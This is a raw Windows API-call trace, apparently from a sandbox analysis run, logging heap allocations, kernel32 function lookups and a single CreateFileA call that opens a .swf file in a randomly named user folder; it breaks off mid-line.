1 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.978] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.980] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c808 [0043.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c808, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.980] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c808 [0043.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.981] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0043.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d) returned 0x7ab260 [0043.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf", cchWideChar=61, lpMultiByteStr=0x7ab260, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf", lpUsedDefaultChar=0x0) returned 61 [0043.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.982] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.982] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\tvat.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7a) returned 0x7d5bb8 [0043.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=61, lpWideCharStr=0x7d5bb8, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\tvat.swf") returned 61 [0043.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0043.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.983] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0043.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.984] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.986] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: 